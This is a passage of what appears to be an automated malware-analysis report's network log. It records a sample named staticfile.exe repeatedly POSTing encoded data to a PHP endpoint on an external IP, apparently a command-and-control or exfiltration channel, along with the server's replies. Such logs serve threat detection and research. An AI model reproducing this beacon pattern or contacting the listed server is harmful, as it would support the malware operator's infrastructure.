                                        Nov 30, 2024 22:37:26.747735023 CET2544OUTData Raw: 55 5e 5c 5f 55 58 55 58 55 5c 57 59 50 5f 5a 52 58 54 5b 58 51 5d 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^\_UXUXU\WYP_ZRXT[XQ]SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*.\4<$>+;?<%]<'=+>Z#?W3=7^&#.._/%^/0
                                        Nov 30, 2024 22:37:27.812252045 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:28.052354097 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        69192.168.2.449944213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:28.291414976 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:28.638364077 CET2544OUTData Raw: 55 51 59 59 50 5d 50 58 55 5c 57 59 50 5e 5a 52 58 5a 5b 58 51 5d 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQYYP]PXU\WYP^ZRXZ[XQ]S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C<&71<&;87R184$7[=%(#=3?_&*[:._/%^/4
                                        Nov 30, 2024 22:37:29.718656063 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:29.963192940 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        70192.168.2.449950213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:31.220132113 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:31.576342106 CET2544OUTData Raw: 55 5b 59 5a 55 5f 50 5d 55 5c 57 59 50 5e 5a 5c 58 5a 5b 58 51 50 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[YZU_P]U\WYP^Z\XZ[XQPSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(.##2>,Z/&+4V'>+=/Y :$-']$#9.$._/%^/4
                                        Nov 30, 2024 22:37:32.592082977 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:32.835195065 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:32 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        71192.168.2.449954213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:33.101998091 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:33.450905085 CET2544OUTData Raw: 50 5a 59 5e 55 5e 50 58 55 5c 57 59 50 5d 5a 57 58 5b 5b 53 51 5e 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZY^U^PXU\WYP]ZWX[[SQ^S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*>!"&';,% U3+>&?X Y=U$-4& &Y:4._/%^/8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        72192.168.2.449958213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:34.011780977 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1404
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:34.357161999 CET1404OUTData Raw: 55 51 59 5c 55 5c 50 59 55 5c 57 59 50 53 5a 53 58 5c 5b 5f 51 50 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQY\U\PYU\WYPSZSX\[_QPSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(*71'&<]/Z $+?%- )&0#/&3 13^.._/%^/
                                        Nov 30, 2024 22:37:35.560096979 CET405INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 37 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 03 11 23 15 2b 5e 26 11 3c 01 2d 59 2c 2f 24 1e 24 38 21 5f 2f 3d 29 5f 29 3a 3a 00 29 02 31 1e 22 3b 2b 5c 28 17 3d 0a 30 36 0c 5c 28 3b 2b 5e 0c 1b 20 40 3f 15 29 5d 24 28 3b 04 30 23 2f 07 21 08 28 00 27 2d 2a 55 2b 06 26 17 23 21 3d 0b 2c 0c 3d 56 26 00 2f 06 29 01 01 1f 35 03 2f 56 0b 12 22 52 27 0b 29 11 26 06 27 00 37 0e [TRUNCATED]
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:37:35 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8#+^&<-Y,/$$8!_/=)_)::)1";+\(=06\(;+^ @?)]$(;0#/!('-*U+&#!=,=V&/)5/V"R')&'7="!#:68("!0')-1_&'=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        73192.168.2.449960213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:34.209863901 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:34.560343027 CET2544OUTData Raw: 55 58 59 5f 50 5a 50 5a 55 5c 57 59 50 5e 5a 52 58 54 5b 5e 51 58 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UXY_PZPZU\WYP^ZRXT[^QXS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+X-74]2>,\8,/U&8'$[4*'Y#)W'.#_%&[:._/%^/4
                                        Nov 30, 2024 22:37:35.565790892 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:35.807265043 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:35 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        74192.168.2.449964213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:36.189996004 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:36.573163986 CET2544OUTData Raw: 55 5f 59 55 55 55 55 5d 55 5c 57 59 50 52 5a 53 58 58 5b 59 51 51 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_YUUUU]U\WYPRZSXX[YQQS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+: $X%8,T%]$T0+(% Y-0#[& 5-._/%^/
                                        Nov 30, 2024 22:37:37.592238903 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:37.844475985 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:37 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        75192.168.2.449969213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:38.088835955 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:38.436404943 CET2544OUTData Raw: 55 5e 5c 59 55 55 50 5c 55 5c 57 59 50 5d 5a 53 58 5f 5b 5f 51 51 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^\YUUP\U\WYP]ZSX_[_QQSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!@(>241(Y1<8<7U%#$-8*C;["?!R3=$#-$._/%^/8
                                        Nov 30, 2024 22:37:39.518942118 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:39.753978014 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:39 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        76192.168.2.449974213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:40.060707092 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:40.419713974 CET2544OUTData Raw: 50 5a 59 54 55 5a 50 59 55 5c 57 59 50 5a 5a 52 58 5b 5b 53 51 5f 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZYTUZPYU\WYPZZRX[[SQ_S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+&4"32=;-< %3$> /'-[&>:4._/%^/$


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        77192.168.2.449977213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:40.697290897 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:41.044842958 CET1428OUTData Raw: 55 5b 59 55 55 5b 55 5c 55 5c 57 59 50 5a 5a 57 58 58 5b 52 51 5d 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[YUU[U\U\WYPZZWXX[RQ]SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!@<> 1#&>(Z/,/S%33><)'7/9R$<&0=:._/%^/$
                                        Nov 30, 2024 22:37:42.098406076 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:42.352291107 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 5f 3f 38 0b 00 2b 38 2d 5d 2e 3f 28 1c 26 06 0b 58 2d 2e 25 5d 29 39 2a 02 29 05 25 53 35 5e 28 01 3c 07 21 0d 27 36 32 1f 28 2b 2b 5e 0c 1b 23 1c 3c 05 26 01 27 15 23 07 24 33 3f 03 35 31 09 5e 26 2e 2d 0a 28 16 2e 17 34 31 32 54 2d 22 07 55 31 17 3c 5b 3e 2c 2f 1c 36 29 2f 56 0b 12 22 50 30 32 3a 01 26 3f 0a 1f 23 1e 0c 5c 22 36 2e 5d 23 3c 35 1e 36 06 2a 58 2b 00 26 12 34 33 02 52 3e 5b 3e 02 25 22 20 08 2b 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #_?8+8-].?(&X-.%])9*)%S5^(<!'62(++^#<&'#$3?51^&.-(.412T-"U1<[>,/6)/V"P02:&?#\"6.]#<56*X+&43R>[>%" +=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        78192.168.2.449979213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:40.828387976 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:41.185400963 CET2544OUTData Raw: 55 5b 59 59 55 5f 50 5d 55 5c 57 59 50 59 5a 50 58 5d 5b 5b 51 5f 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[YYU_P]U\WYPYZPX][[Q_SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+9 +2>;<R$87$-,=%?4*',& ):._/%^/(
                                        Nov 30, 2024 22:37:42.139044046 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:42.373987913 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:41 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        79192.168.2.449984213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:42.751760960 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:43.107196093 CET2536OUTData Raw: 55 5a 5c 5a 50 5e 50 5e 55 5c 57 59 50 5b 5a 5d 58 5b 5b 5a 51 5a 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZ\ZP^P^U\WYP[Z]X[[ZQZS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!+=*]48Y1-+//#V&#'.<>?X#,23=^23-._/%^/
                                        Nov 30, 2024 22:37:44.074878931 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:44.319421053 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        80192.168.2.449988213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:44.569852114 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:44.920974016 CET2544OUTData Raw: 55 5e 59 55 50 5a 50 59 55 5c 57 59 50 58 5a 5d 58 5c 5b 52 51 5d 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^YUPZPYU\WYPXZ]X\[RQ]S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?=& 1+$>/,,/W%] 0;[=%8 !$4%)-._/%^/,
                                        Nov 30, 2024 22:37:46.006258965 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:46.252747059 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        81192.168.2.449994213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:46.497916937 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:46.857460976 CET2544OUTData Raw: 55 5e 59 5e 55 5b 55 5a 55 5c 57 59 50 5c 5a 52 58 54 5b 59 51 59 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^Y^U[UZU\WYP\ZRXT[YQYS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?>:72X14-<R23$^=%7/%'+^235-$._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        82192.168.2.449999213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:47.478658915 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
